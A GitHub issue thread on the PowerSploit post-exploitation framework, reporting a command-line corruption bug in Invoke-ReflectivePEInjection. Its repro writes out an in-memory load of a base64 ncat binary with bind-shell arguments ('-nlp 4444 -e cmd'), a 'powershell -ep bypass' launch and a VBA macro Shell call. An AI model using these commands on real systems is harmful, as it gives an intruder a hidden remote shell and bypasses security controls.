search

PowerShellMafia / PowerSploit

PowerSploit - A PowerShell Post-Exploitation Framework
Other
11.77k stars 4.59k forks source link

Invoke-ReflectivePEInjection -ExeArgs does not sweep previous CommandLine #281

Open mgeeky opened 6 years ago

mgeeky commented 6 years ago

Hello there,

I'd like to report an issue with the code handling buffer jugglings around process' command line. When the Powershell get's executed with some of it's inner arguments, like powershell -ep bypass - the joined process' own command line and this produced from parsing -ExeArgs leads to undefined behaviour and corrupted command line.

Here's the example:

  1. Start up the Powershell interpreter like so: powershell -ep bypass
  2. We are invoking Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "-nlp 4444 -e cmd"
  3. The PE image being injected is classic ncat.exe coming straight from the nmap.org.
  4. The resulted verbose output becomes:
PS C:\Users\IEUser\Desktop> .\decoded.ps1
VERBOSE: PowerShell ProcessID: 6076
VERBOSE: Calling Invoke-MemoryLoadLibrary
VERBOSE: Getting basic PE information from the file
VERBOSE: Allocating memory for the PE and write its headers to memory
VERBOSE: Getting detailed PE information from the headers loaded in memory
VERBOSE: StartAddress: 0x0AAC0000    EndAddress: 0x0AB2D000
VERBOSE: Copy PE sections in to memory
VERBOSE: Update memory addresses based on where the PE was actually loaded in memory
VERBOSE: Import DLL's needed by the PE we are loading
VERBOSE: Done importing DLL imports
VERBOSE: Update memory protection flags
VERBOSE: Call EXE Main function. Address: 0x0AB04C04. Creating thread for the EXE to run in.
Ncat: Could not resolve hostname "bypass": The requested name is valid, but no data of the requested type was found. . QUITTING.
VERBOSE: EXE thread has completed.
VERBOSE: Done!
PS C:\Users\IEUser\Desktop>

Now, one can clearly observe that ncat complains about inability to resolve bypass host. This must be an issue with appended EXE args to original process' command line, or the fact that original process command line has not been previously zeroed-out, or something.

The exact invocation is kinda like:

$ncat = Get-Content $env:temp\ncat.b64;
$PEBytes = [System.Convert]::FromBase64String($ncat);
Invoke-PEInjectionInMemory -PEBytes $PEBytes -ExeArgs "-nlp 4444 -e cmd"

The same behaviour goes for other invocations like from VBA Macro code leveraging Shell(" [...] powershell -ep bypass -file decoded.ps1").

jammys commented 6 years ago

Any idea on how to fix it? The same problem occurs on my VM (Windows 10 x64)

mgeeky commented 6 years ago

I've proposed by solution in PR#280.